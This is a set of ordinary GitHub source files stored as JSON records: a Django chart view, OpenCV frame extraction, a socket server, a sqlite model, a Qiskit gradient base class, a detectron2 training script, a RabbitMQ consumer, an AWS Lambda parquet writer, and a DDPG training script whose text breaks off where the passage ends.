+{"seq_id":"42911449339","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\n# Include the `fusioncharts.py` file which has required functions to embed the charts in html page\nfrom fusioncharts import FusionCharts\n\n# Loading Data from a Static JSON String\n# It is a example to show a MsCombi 2D chart where data is passed as object.\n# The `chart` method is defined to load chart data\ndef chart(request):\n\n datasource = {}\n datasource[\"chart\"] = {\n \"caption\": \"Actual Revenues, Targeted Revenues & Profits\",\n \"subcaption\": \"Last year\",\n \"xaxisname\": \"Month\",\n \"yaxisname\": \"Amount (In USD)\",\n \"numberprefix\": \"$\",\n \"theme\": \"ocean\"\n }\n datasource[\"categories\"] = [{\n \"category\": [\n {\"label\": \"Jan\"},\n {\"label\": \"Feb\"},\n {\"label\": \"Mar\"},\n {\"label\": \"Apr\"},\n {\"label\": \"May\"},\n {\"label\": \"Jun\"},\n {\"label\": \"Jul\"},\n {\"label\": \"Aug\"},\n {\"label\": \"Sep\"},\n {\"label\": \"Oct\"},\n {\"label\": \"Nov\"},\n {\"label\": \"Dec\"}\n ]\n }]\n\n datasource[\"dataset\"] = [{\n \"seriesname\": \"Actual Revenue\",\n \"data\": [\n {\"value\": \"16000\"},\n {\"value\": \"20000\"},\n {\"value\": \"18000\"},\n {\"value\": \"19000\"},\n {\"value\": \"15000\"},\n {\"value\": \"21000\"},\n {\"value\": \"16000\"},\n {\"value\": \"20000\"},\n {\"value\": \"17000\"},\n {\"value\": \"25000\"},\n {\"value\": \"19000\"},\n {\"value\": \"23000\"}\n ]\n }, {\n \"seriesname\": \"Projected Revenue\",\n \"renderas\": \"line\",\n \"showvalues\": \"0\",\n \"data\": [\n {\"value\": \"15000\"},\n {\"value\": \"16000\"},\n {\"value\": \"17000\"},\n {\"value\": \"18000\"},\n {\"value\": \"19000\"},\n {\"value\": \"19000\"},\n {\"value\": \"19000\"},\n {\"value\": \"19000\"},\n {\"value\": \"20000\"},\n {\"value\": \"21000\"},\n {\"value\": \"22000\"},\n {\"value\": \"23000\"}\n ]\n }, {\n \"seriesname\": \"Profit\",\n \"renderas\": \"area\",\n \"showvalues\": \"0\",\n \"data\": [\n {\"value\": \"4000\"},\n {\"value\": \"5000\"},\n {\"value\": \"3000\"},\n {\"value\": \"4000\"},\n {\"value\": \"1000\"},\n {\"value\": \"7000\"},\n {\"value\": \"1000\"},\n {\"value\": \"4000\"},\n {\"value\": \"1000\"},\n {\"value\": \"8000\"},\n {\"value\": \"2000\"},\n {\"value\": \"7000\"}\n ]\n }\n ]\n\n # Create an object for the mscombi2d chart using the FusionCharts class constructor\n mscombi2dChart = FusionCharts(\"mscombi2d\", \"ex1\", \"100%\", 400, \"chart-1\", \"json\", datasource)\n # returning complete JavaScript and HTML code, which is used to generate chart in the browsers. \n pyramidChart = FusionCharts(\"pyramid\", \"ex2\", \"70%\", \"385\", \"chart-2\", \"json\", \n \"\"\"{\n \"chart\": {\n \"bgcolor\": \"FFFFFF\",\n \"caption\": \"Revenue distribution for 2017\",\n \"basefontcolor\": \"333333\",\n \"decimals\": \"0\",\n \"numbersuffix\": \"M\",\n \"numberprefix\": \"$\",\n \"pyramidyscale\": \"40\",\n \"chartbottommargin\": \"0\",\n \"captionpadding\": \"0\",\n \"showborder\": \"0\"\n },\n \"data\": [\n {\n \"value\": \"17\",\n \"name\": \"Products\",\n \"color\": \"008ee4\"\n },\n {\n \"value\": \"21\",\n \"name\": \"Services\",\n \"color\": \"6baa01\"\n },\n {\n \"value\": \"20\",\n \"name\": \"Consultancy\",\n \"color\": \"f8bd19\"\n },\n {\n \"value\": \"5\",\n \"name\": \"Others\",\n \"color\": \"e44a00\"\n }\n ]\n }\"\"\")\n\n # Create an object for the funnel chart using the FusionCharts class constructor\n funnelChart = FusionCharts(\"funnel\", \"ex3\", \"70%\", \"385\", \"chart-3\", \"json\", \n \"\"\"{\n \"chart\": {\n \"bgcolor\": \"FFFFFF\",\n \"caption\": \"Conversion - 2017\",\n \"decimals\": \"1\",\n \"basefontsize\": \"11\",\n \"issliced\": \"0\",\n \"ishollow\": \"1\",\n \"labeldistance\": \"8\",\n \"showBorder\": \"0\"\n },\n \"data\": [\n {\n \"label\": \"Website Visits\",\n \"value\": \"385634\"\n },\n {\n \"label\": \"Downloads\",\n \"value\": \"145631\",\n \"color\": \"008ee4\"\n },\n {\n \"label\": \"Interested to Participate\",\n \"value\": \"84564\",\n \"color\": \"f8bd19\"\n },\n {\n \"label\": \"Contracts finalized\",\n \"value\": \"50654\",\n \"color\": \"6baa01\"\n },\n {\n \"label\": \"Adquired\",\n \"value\": \"25342\",\n \"color\": \"e44a00\"\n }\n ]\n }\"\"\")\n\n pie3d = FusionCharts(\"pie3d\", \"ex4\" , \"80%\", \"400\", \"chart-4\", \"json\", \n # The data is passed as a string in the `dataSource` as parameter.\n \"\"\"{ \n \"chart\": {\n \"caption\": \"Age profile of website visitors\",\n \"subcaption\": \"Last Year\",\n \"startingangle\": \"120\",\n \"showlabels\": \"0\",\n \"showlegend\": \"1\",\n \"enablemultislicing\": \"0\",\n \"slicingdistance\": \"15\",\n \"showpercentvalues\": \"1\",\n \"showpercentintooltip\": \"0\",\n \"plottooltext\": \"Age group : $label Total visit : $datavalue\",\n \"theme\": \"ocean\"\n },\n \"data\": [\n {\"label\": \"Teenage\", \"value\": \"1250400\"},\n {\"label\": \"Adult\", \"value\": \"1463300\"},\n {\"label\": \"Mid-age\", \"value\": \"1050700\"},\n {\"label\": \"Senior\", \"value\": \"491000\"}\n ]\n }\"\"\")\n # returning complete JavaScript and HTML code, which is used to generate chart in the browsers. \n return render(request, 'index.html', {'mscombi2dChart' : mscombi2dChart.render(), 'pyramidChart' : pyramidChart.render(),\n 'funnelChart' : funnelChart.render(), 'pie3d': pie3d.render()})","repo_name":"Brunux/subscriber-backend","sub_path":"analytics/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"39729302943","text":"import cv2\nimport math\n\n\n\ncap = cv2.VideoCapture(r\"F:\\计算机设计大赛\\计设数据集\\最终数据集视频\\2023_4_19_成功1.avi\")\nframeRate = cap.get(5) # frame rate\nif not cap.isOpened():\n print('error')\n exit(-1)\nwhile (cap.isOpened()):\n frameId = cap.get(1) # current frame number\n ret, frame = cap.read()\n if (ret != True):\n break\n if frameId % math.floor(frameRate) == 0:\n filename = '../Dataset/oriData/image_2_' + str(int(frameId)) + \".png\"\n try:\n cv2.imwrite(filename, frame)\n except:\n print('error occur, maybe img folder not exist')\ncap.release()\nprint (\"Done!\")","repo_name":"tsieyy/data_augmentation","sub_path":"tools/avi2jpg.py","file_name":"avi2jpg.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"39534498596","text":"import random, sys, copy\nfrom src.Camera import Camera\n\n\nclass State:\n def __init__(self, problem, cameras=None):\n self.problem = problem\n self.cameras = []\n self.cameras = cameras if cameras is not None else self.generateCameras()\n self.energy = sys.maxsize\n self.coverage_energy = None\n self.camera_cost = None\n self.redundancy_cost = None\n\n def getRandomFreePointFromRoom(self):\n free_points = self.getFreePoints()\n if not free_points:\n error = \"Exception in State.getRandomFreePointFromRoom: no points left!\"\n raise RuntimeError(error)\n else:\n return random.choice(free_points)\n\n def getFreePoints(self):\n def isCameraPos(cls, pos):\n for c in cls.cameras:\n if c.x == pos[0] and c.y == pos[1]:\n return True\n return False\n\n return list(filter(lambda p: not isCameraPos(self, p), self.problem.inside_points))\n\n def generateCameras(self):\n cameras = []\n for _ in range(self.problem.min_number_of_cams):\n cameras.append(Camera(self.problem, self.getRandomFreePointFromRoom()))\n\n return cameras\n\n def generateNeighbour(self, camera_move_method):\n # deep copy cameras\n cameras = [copy.copy(c) for c in self.cameras]\n\n transformation = self.randomlyChooseTransformationMethod(cameras)\n\n # perform transformation\n if transformation == 'insert':\n new_camera = Camera(self.problem, self.getRandomFreePointFromRoom())\n cameras.append(new_camera)\n elif transformation == 'remove':\n cameras.remove(random.choice(self.cameras))\n elif transformation == 'move':\n to_modify = random.choice(self.cameras)\n if camera_move_method == 'local':\n to_modify.move()\n elif camera_move_method == 'random':\n to_modify.move(self.getRandomFreePointFromRoom())\n else:\n raise RuntimeError(\"Wrong move camera method!\")\n else:\n raise RuntimeError(\"Wrong transformation method!\")\n\n return State(self.problem, cameras)\n\n def randomlyChooseTransformationMethod(self, cameras):\n free_points = self.getFreePoints()\n choices = set()\n\n if len(cameras) <= 1:\n choices.add('insert')\n else:\n choices.add('remove')\n if len(free_points) > 0:\n choices.update({'insert', 'move'})\n return random.choice(tuple(choices))\n","repo_name":"wfranus/cameras","sub_path":"src/State.py","file_name":"State.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"}
+{"seq_id":"29988229208","text":"import math\n\nfrom Artist import Artist\nfrom ArtistTags import ArtistTags\nfrom TagArtistWeights import TagArtistWeights\n\nclass ArtistWeightCalc:\n \"\"\"\n Calculates the weights of artists to tags they have been assigned to.\n\n For instance, artists tagged only as \"funk\" are weighted higher than\n artists tagged partially as \"funk\".\n \"\"\"\n\n def __init__(self):\n # Tags used fewer times will be excluded from the graph\n self._minTagCount = 0\n\n # Map from artistId to artist object\n # Ensures uniqueness of Artist objects to save memory\n self._artists = {}\n\n # Stores the relationship between artists and tags\n self._artistTags = ArtistTags()\n\n def setMinTagCount(self, minTagCount):\n self._minTagCount = minTagCount\n\n def add(self, artistId, artistName, tag, tagCount):\n artistId = artistId.lower()\n artistName = artistName.lower()\n tag = tag.lower()\n\n # Get the artist. O(1) on average\n artist = None\n if artistId in self._artists:\n artist = self._artists[artistId]\n else:\n artist = Artist(artistId, artistName)\n self._artists[artistId] = artist\n \n self._artistTags.add(artist, tag, tagCount)\n\n return artist\n\n def pruneTags(self):\n tagsToRemove = []\n\n for tag in self._artistTags.getTags():\n if not self._acceptTag(tag):\n tagsToRemove.append(tag)\n\n for tag in tagsToRemove:\n artistsWithNoTags = self._artistTags.remove(tag)\n\n for artist in artistsWithNoTags:\n del self._artists[artist.getId()]\n\n def getTagToArtistsWeights(self):\n # Dictionary from tag to (Artist, weight)\n tagArtistWeights = TagArtistWeights()\n\n totalTagCount = self._artistTags.getTagCount() \n\n for tag in self._artistTags.getTags():\n currentTagCount = self._artistTags.getTotalTagCount(tag)\n\n for artist in self._artistTags.getArtistsWithTag(tag):\n artistTagCount = self._artistTags.getTagCountOfArtist(tag, artist)\n # Number of times the artist appears for the tag / number of artist songs for tag\n tf = artistTagCount / currentTagCount\n # loge(number of tags / number of tags with artist)\n idf = math.log(totalTagCount / self._artistTags.getArtistTagCount(artist))\n\n #print('For Artist %s with tag %s' %(artist.getName(), tag))\n #print(' tf = %d / %d = %.3f' %(artistTagCount, currentTagCount, tf))\n #print(' idf = log(%d / %d) = %.3f' %(totalTagCount, self._artistTags.getArtistTagCount(artist), idf))\n #print(' tf*idf = %.3f' %(tf * idf))\n\n tfidf = tf * idf\n\n tagArtistWeights.add(tag, artist, tfidf)\n\n return tagArtistWeights\n\n def _acceptTag(self, tag):\n \"\"\" Flags to disregard tags which are only used once. \"\"\"\n return len(self._artistTags.getArtistsWithTag(tag)) >= self._minTagCount\n\n def getArtistTags(self):\n return self._artistTags\n\n def getArtists(self):\n return self._artists\n\n def getStatsString(self):\n return 'Stats: #artists: %d, #tags: %d' % (len(self._artists), self._artistTags.getTagCount())\n\n","repo_name":"FahmiA/MatchThatGenre","sub_path":"TagGraphGenerator/ArtistWeightCalc.py","file_name":"ArtistWeightCalc.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"37776546002","text":"import socket\nfrom threading import Lock, Thread\n\nfrom request import Request\nfrom response import Response\n\nclass Server:\n BUFFERSIZE = 1024\n def __init__(self, host: str, port: int, debug:bool=False):\n self._host = host\n self._port = port\n self._s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._debug = debug\n self._print_lock = Lock()\n\n def initialize(self):\n self._s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self._s.bind((self._host, self._port))\n self._s.listen(5) # Don't know what the number does and seems to not matter\n self._debug_print(f\"listening on {self._host}:{self._port}\")\n self._running = False\n\n def run(self):\n self._running = True\n while self._running:\n try:\n conn, addr = self._s.accept()\n self._debug_print(f\"Accepted connection from {str(addr)}\")\n t = Thread(target=self.handle_client, args=(conn, addr))\n t.start()\n except KeyboardInterrupt:\n self._running = False\n\n self._debug_print(\"Closing server\")\n self._s.close()\n\n def handle_client(self, conn: socket.socket, addr):\n data = conn.recv(Server.BUFFERSIZE)\n req = Request()\n if req.parse(data):\n self._debug_print(f\"Incoming {req.get_method().value} request for {req._path} from {str(addr)}\")\n resp = Response()\n resp.compose_response(req)\n to_send = resp.encode()\n conn.send(to_send)\n\n self._debug_print(f\"Closing connection from {str(addr)}\")\n conn.close()\n\n def _debug_print(self, msg):\n if self._debug:\n with self._print_lock:\n print(msg)\n","repo_name":"yutytuty/ImprovedHttpServer","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"33213630671","text":"import sqlite3\r\n\r\n\r\nclass Review:\r\n dbpath = \"data/stacked.db\"\r\n\r\n\r\n def __init__(self, pk,review,company,time_stamp,pros,cons,users_pk ):\r\n self.pk = pk\r\n self.review = review\r\n self.company = company\r\n self.time_stamp = time_stamp\r\n self.pros = pros\r\n self.cons = cons\r\n self.users_pk=users_pk\r\n \r\n\r\n\r\n\r\n def _insert(self):\r\n with sqlite3.connect(self.dbpath) as conn:\r\n cursor = conn.cursor()\r\n SQL = \"\"\"INSERT INTO reviews(\r\n review,company,time_stamp,pros,cons,users_pk) \r\n VALUES (?,?,?,?,?,?);\"\"\"\r\n\r\n values = (self.review,self.company,self.time_stamp,self.pros,self.cons,self.users_pk)\r\n cursor.execute(SQL, values)\r\n\r\n\r\n def save(self):\r\n if self.pk:\r\n self._update()\r\n else:\r\n self._insert()\r\n\r\n\r\n\r\n @classmethod\r\n def count_reviews(cls,company):\r\n with sqlite3.connect(cls.dbpath) as conn:\r\n cursor = conn.cursor()\r\n SQL = \"\"\" SELECT COUNT(review) FROM reviews WHERE company=?\"\"\"\r\n cursor.execute(SQL, (company,))\r\n row = cursor.fetchall()\r\n return row\r\n\r\n\r\n @classmethod\r\n def get_reviews(cls,company):\r\n with sqlite3.connect(cls.dbpath) as conn:\r\n cursor = conn.cursor()\r\n SQL = \"\"\" SELECT review,time_Stamp ,pros,cons FROM reviews WHERE company=?\"\"\"\r\n cursor.execute(SQL, (company,))\r\n row = cursor.fetchall()\r\n return row","repo_name":"kbrien11/stackedcash","sub_path":"app/review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"15356248658","text":"import logging\nfrom abc import abstractmethod\nfrom typing import List, Union, Optional, Tuple\n\nfrom qiskit.aqua.operators.converters.converter_base import ConverterBase\nfrom qiskit.aqua.operators.operator_base import OperatorBase\nfrom qiskit.circuit import ParameterExpression, ParameterVector\n\nlogger = logging.getLogger(__name__)\n\n\nclass CircuitGradient(ConverterBase):\n r\"\"\"Circuit to gradient operator converter.\n\n Converter for changing parameterized circuits into operators\n whose evaluation yields the gradient with respect to the circuit parameters.\n\n This is distinct from DerivativeBase converters which take gradients of composite\n operators and handle things like differentiating combo_fn's and enforcing product rules\n when operator coefficients are parameterized.\n\n CircuitGradient - uses quantum techniques to get derivatives of circuits\n DerivativeBase - uses classical techniques to differentiate operator flow data structures\n \"\"\"\n\n # pylint: disable=arguments-differ\n @abstractmethod\n def convert(self,\n operator: OperatorBase,\n params: Optional[Union[ParameterExpression, ParameterVector,\n List[ParameterExpression],\n Tuple[ParameterExpression, ParameterExpression],\n List[Tuple[ParameterExpression, ParameterExpression]]]]\n = None,\n ) -> OperatorBase:\n r\"\"\"\n Args:\n operator: The operator we are taking the gradient of\n params: The parameters we are taking the gradient wrt: ω\n If a ParameterExpression, ParameterVector or List[ParameterExpression] is given,\n then the 1st order derivative of the operator is calculated.\n If a Tuple[ParameterExpression, ParameterExpression] or\n List[Tuple[ParameterExpression, ParameterExpression]]\n is given, then the 2nd order derivative of the operator is calculated.\n\n Returns:\n An operator whose evaluation yields the Gradient.\n\n Raises:\n ValueError: If ``params`` contains a parameter not present in ``operator``.\n \"\"\"\n raise NotImplementedError\n","repo_name":"qiskit-community/qiskit-aqua","sub_path":"qiskit/aqua/operators/gradients/circuit_gradients/circuit_gradient.py","file_name":"circuit_gradient.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":564,"dataset":"github-code","pt":"66"}
+{"seq_id":"29597493332","text":"'''\n2020/10/29\n모델 새로 학습 시킬 때 output folder 지우고 val_result 안에 있는 사진 파일 지우거나 백업\nvideorighter\n'''\n\nfrom detectron2.structures import BoxMode\nfrom detectron2.utils.logger import setup_logger\n\nsetup_logger()\nimport numpy as np\nimport os, json, cv2, random\nimport matplotlib.pyplot as plt\n\nfrom detectron2 import model_zoo\nfrom detectron2.engine import DefaultPredictor, DefaultTrainer\nfrom detectron2.config import get_cfg\nfrom detectron2.utils.visualizer import Visualizer, ColorMode\nfrom detectron2.data import MetadataCatalog, DatasetCatalog\nfrom PIL import ImageFile\nimport time\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\n\ndef get_facelip_dtcs(json_dir):\n json_file = json_dir\n with open(json_file) as f:\n imgs_anns = json.load(f)\n dataset_dicts = []\n for z in range(len(imgs_anns['images'])):\n record = {}\n record['file_name'] = imgs_anns['images'][z]['file_name']\n record['image_id'] = imgs_anns['images'][z]['id']\n record['width'] = imgs_anns['images'][z]['width']\n record['height'] = imgs_anns['images'][z]['height']\n anno_list = []\n for i in range(len(imgs_anns['annotations'])):\n anno = {}\n if imgs_anns['images'][z]['id'] == imgs_anns['annotations'][i]['image_id']:\n anno['bbox'] = imgs_anns['annotations'][i]['bbox'].copy() # check\n anno['bbox_mode'] = BoxMode.XYWH_ABS\n anno['segmentation'] = []\n anno['category_id'] = imgs_anns['annotations'][i]['category_id']-1 # check\n anno_list.append(anno)\n record['annotations'] = anno_list\n dataset_dicts.append(record)\n return dataset_dicts\ndataset_dicts_train = get_facelip_dtcs(\"/home/videorighter/detectron/FACELIP_DATA_train/annotations/output_train.json\")\nprint(len(dataset_dicts_train))\n\nstart = time.time()\n############################### get resister, metadata #################################\nfor d in [\"train\", \"val\"]:\n DatasetCatalog.register(\"facelip_\" + d, lambda d=d: get_facelip_dtcs(\n \"/home/videorighter/detectron/FACELIP_DATA_\" + d + \"/annotations/output_\" + d + \".json\"))\n MetadataCatalog.get(\"facelip_\" + d).set(thing_classes=[\"lip\", \"face\", \"product\"])\ntrain_facelip_metadata = MetadataCatalog.get(\"facelip_train\")\nval_facelip_metadata = MetadataCatalog.get(\"facelip_val\")\n\n\n################################# training model #######################################\ncfg = get_cfg()\ncfg.merge_from_file(\n \"/home/videorighter/detectron/detectron2/configs/COCO-Detection/faster_rcnn_X_101_32x8d_FPN_3x.yaml\")\ncfg.DATASETS.TRAIN = (\"facelip_train\",)\ncfg.DATASETS.TEST = () # no metrics implemented for this dataset\ncfg.DATALOADER.NUM_WORKERS = 2\ncfg.MODEL.MASK_ON = False\n# cfg.MODEL.BACKBONE.FREEZE_AT = 0\ncfg.MODEL.WEIGHTS = \"/home/videorighter/detectron/detectron2/configs/COCO-Detection/model_final_68b088.pkl\" # initialize from model zoo\ncfg.SOLVER.IMS_PER_BATCH = 1\ncfg.SOLVER.BASE_LR = 0.0001\ncfg.SOLVER.MAX_ITER = 4000 # 300 iterations seems good enough, but you can certainly train longer\ncfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = 128 # faster, and good enough for this toy dataset\ncfg.MODEL.ROI_HEADS.NUM_CLASSES = 3 # 2 classes (lip, face, product)\n\nos.makedirs(cfg.OUTPUT_DIR, exist_ok=True)\ntrainer = DefaultTrainer(cfg)\n\n# 이전에 학습시킨 pth파일로 resume할 것인지 여부\ntrainer.resume_or_load(resume=True)\ntrainer.train()\n\n\n################################# model test ####################################\ncfg.DATASETS.TEST = (\"facelip_val\",) # no metrics implemented for this dataset\ncfg.MODEL.WEIGHTS = os.path.join(cfg.OUTPUT_DIR, \"model_final.pth\")\ncfg.MODEL.RETINANET.SCORE_THRESH_TEST = 0.2 # set the testing threshold for this model\npredictor = DefaultPredictor(cfg)\n\n\n############################# validation print ##################################\ndataset_dicts_val = get_facelip_dtcs(\"/home/videorighter/detectron/FACELIP_DATA_val/annotations/output_val.json\")\nfor d in dataset_dicts_val:\n im = cv2.imread(d[\"file_name\"])\n outputs = predictor(im)\n v = Visualizer(im[:, :, ::-1],\n metadata=val_facelip_metadata,\n scale=1)\n v = v.draw_instance_predictions(outputs[\"instances\"].to(\"cpu\"))\n img = v.get_image()[:, :, ::-1]\n cv2.imwrite(os.path.join(\"/home/videorighter/detectron/val_result\", os.path.split(d[\"file_name\"])[1]), img)\n\n############################# validation score ###################################\nfrom detectron2.evaluation import COCOEvaluator, inference_on_dataset\nfrom detectron2.data import build_detection_test_loader\n\nevaluator = COCOEvaluator(\"facelip_val\", cfg, False, output_dir=\"./output_val/\")\nval_loader = build_detection_test_loader(cfg, \"facelip_val\")\nprint(inference_on_dataset(trainer.model, val_loader, evaluator))\nprint(\"running time: \", time.time() - start)","repo_name":"videorighter/object_detection","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"}
+{"seq_id":"32501108849","text":"#12.lista\ndef productoEscalar(a,b):\n producto=0\n for i in range(len(a)):\n producto +=a[i]*b[i]\n return producto\n \n \n \n \nd=[3,2,8,7,8,1,9,10]\ne=[3,2,8,7,8,1,9,10]\nprint(productoEscalar(d,e))","repo_name":"anaicm/Principio_Programacion_Python","sub_path":"practica 8/12.listas.2.py","file_name":"12.listas.2.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"71136930772","text":"import pika\nimport json\n\n# Connect to RabbitMQ\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\n\n\n# Function will be applied then message received\ndef callback(ch, method, properties, body):\n if properties.content_type == 'application/json':\n d = json.loads(body.decode())\n print(\" [x] Received %r\" % d)\n else:\n print(\" [x] Received %r\" % body.decode())\n\n\nchannel.queue_declare(queue='hello') # declare queue just in case it does not exists\n\nchannel.basic_consume(queue='hello', # name of queue\n auto_ack=True, # if python crashes => do not send message back to queue\n # delete message from queue immediately (without waiting for response from consumer)\n on_message_callback=callback) # function to be applied\n\nprint(' [*] Waiting for messages. To exit press CTRL+C')\nchannel.start_consuming()\n","repo_name":"DmitriiDenisov/rabbitmq_lab","sub_path":"tutorial_1/receive.py","file_name":"receive.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"}
+{"seq_id":"39080353890","text":"\"\"\"\nExample taken from here:\nhttps://realpython.com/async-io-python/\n\na corouting makerandom() keeps producing random int\nin the range (0, 10). Until one of them exceeds a threshold,\nlet multiple calls of this corouting not need to wait\nfor each other to complete in succession.\n\"\"\"\n\nimport asyncio\nimport random\n\n# ANSI colors\nc = (\n \"\\033[0m\", # End of color\n \"\\033[36m\", # Cyan\n \"\\033[91m\", # Red\n \"\\033[35m\", # Magenta\n)\n\nasync def randint(a: int, b: int) -> int:\n return random.randint(a, b)\n\nasync def makerandom(idx: int, threshold: int = 6) -> int:\n print(c[idx + 1] + f\"Initiated makerandom({idx}).\")\n i = await randint(0, 10)\n while i <= threshold:\n print(c[idx + 1] + f\"makerandom({idx}) == {i} too low; retrying.\")\n await asyncio.sleep(idx + 1)\n i = await randint(0, 10)\n \n print(c[idx + 1] + f\"---> Finished: makerandom({idx}) == {i}\" + c[0])\n return i\n\nasync def main():\n # gather tasks\n res = await asyncio.gather(\n *(makerandom(i, 10 - i -1) for i in range(3))\n )\n return res\n\nif __name__ == \"__main__\":\n random.seed(444)\n r1, r2, r3 = asyncio.run(main())\n print()\n print(f\"r1: {r1}, r2: {r2}, r3: {r3}\")","repo_name":"adikabintang/learn-python","sub_path":"22_asyncio/2_rand.py","file_name":"2_rand.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"342481725","text":"# awswrangler used toaccess files stored in s3 directly\r\nimport awswrangler as wr\r\nimport pandas as pd\r\nimport urllib.parse\r\nimport os\r\n\r\n# Temporary hard-coded AWS Settings; i.e. to be set as OS variable in Lambda\r\n\r\n# Some values that shouldn't be stored in the code are stored on the pc in external file \r\n# and accessed using os.environ[] method\r\n# \r\nos_input_s3_cleansed_layer = os.environ['s3_cleansed_layer']\r\nos_input_glue_catalog_db_name = os.environ['glue_catalog_db_name']\r\nos_input_glue_catalog_table_name = os.environ['glue_catalog_table_name']\r\nos_input_write_data_operation = os.environ['write_data_operation'] # where we want to append data\r\n\r\n\r\ndef lambda_handler(event, context):\r\n # Get the object from the event and show its content type\r\n\r\n # Reading the file from the s3\r\n # It will use the environ variable to get our bucket name\r\n\r\n bucket = event['Records'][0]['s3']['bucket']['name']\r\n # Will use key provided inside the variable\r\n key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')\r\n try:\r\n\r\n # Creating DF from content\r\n df_raw = wr.s3.read_json('s3://{}/{}'.format(bucket, key))\r\n\r\n # Extract required columns:\r\n df_step_1 = pd.json_normalize(df_raw['items'])\r\n\r\n # Write to S3\r\n wr_response = wr.s3.to_parquet(\r\n df=df_step_1,\r\n path=os_input_s3_cleansed_layer,\r\n dataset=True,\r\n database=os_input_glue_catalog_db_name,\r\n table=os_input_glue_catalog_table_name,\r\n mode=os_input_write_data_operation\r\n )\r\n\r\n return wr_response\r\n except Exception as e:\r\n print(e)\r\n print('Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(key, bucket))\r\n raise e","repo_name":"VaiibhavThatai/YouTube-Data-Pipeline-Using-AWS","sub_path":"lambda_function_yt.py","file_name":"lambda_function_yt.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"72920985489","text":"from unityagents import UnityEnvironment\nimport numpy as np\n\nenv = UnityEnvironment(file_name='Reacher.exe')\n\n# get the default brain\nbrain_name = env.brain_names[0]\nbrain = env.brains[brain_name]\n\n# reset the environment\nenv_info = env.reset(train_mode=True)[brain_name]\n\n# number of agents\nnum_agents = len(env_info.agents)\nprint('Number of agents:', num_agents)\n\n# size of each action\naction_size = brain.vector_action_space_size\nprint('Size of each action:', action_size)\n\n# examine the state space\nstates = env_info.vector_observations\nstate_size = states.shape[1]\nprint('There are {} agents. Each observes a state with length: {}'.format(num_agents, state_size))\nprint('The state for the first agent looks like:', states[0])\n\nenv_info = env.reset(train_mode=False)[brain_name] # reset the environment\n# states = env_info.vector_observations # get the current state (for each agent)\n# scores = np.zeros(num_agents) # initialize the score (for each agent)\n# while True:\n# actions = np.random.randn(num_agents, action_size) # select an action (for each agent)\n# actions = np.clip(actions, -1, 1) # all actions between -1 and 1\n# env_info = env.step(actions)[brain_name] # send all actions to tne environment\n# next_states = env_info.vector_observations # get next state (for each agent)\n# rewards = env_info.rewards # get reward (for each agent)\n# dones = env_info.local_done # see if episode finished\n# scores += env_info.rewards # update the score (for each agent)\n# states = next_states # roll over states to next time step\n# if np.any(dones): # exit loop if episode finished\n# break\n# print('Total score (averaged over agents) this episode: {}'.format(np.mean(scores)))\n\nimport gym\nimport random\nimport torch\nimport numpy as np\nfrom collections import deque\nimport matplotlib.pyplot as plt\n#%matplotlib inline\n\nfrom ddpg_agent import Agent\n\n# create single DDPG Agent\nagent = Agent(state_size=state_size, action_size=action_size, random_seed=10)\n\ndef ddpg(n_episodes=200, max_t=1000):\n scores_deque = deque(maxlen=100)\n scores = []\n max_score = -np.Inf\n for i_episode in range(1, n_episodes+1):\n\n # reset the environment\n env_info = env.reset(train_mode=True)[brain_name]\n states = env_info.vector_observations # NOTE: size =\n\n agent.reset()\n score = 0\n for t in range(max_t):\n actions = agent.act(states)\n\n env_info = env.step(actions)[brain_name] # send all actions to tne environment\n next_states = env_info.vector_observations # get next state (for each agent)\n rewards = env_info.rewards # get reward (for each agent)\n dones = env_info.local_done # see if episode finished\n\n agent.step(states, actions, rewards, next_states, dones)\n states = next_states\n score += np.mean(rewards)\n if any(dones):\n break\n\n scores_deque.append(score)\n scores.append(score)\n print('\\rEpisode {}\\tAverage Score: {:.2f}\\tScore: {:.2f}'.format(i_episode, np.mean(scores_deque), score), end=\"\")\n if i_episode % 100 == 0:\n torch.save(agent.actor_local.state_dict(), 'checkpoint_actor.pth')\n torch.save(agent.critic_local.state_dict(), 'checkpoint_critic.pth')\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_deque)))\n return scores\n\nscores = ddpg()\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nplt.plot(np.arange(1, len(scores)+1), 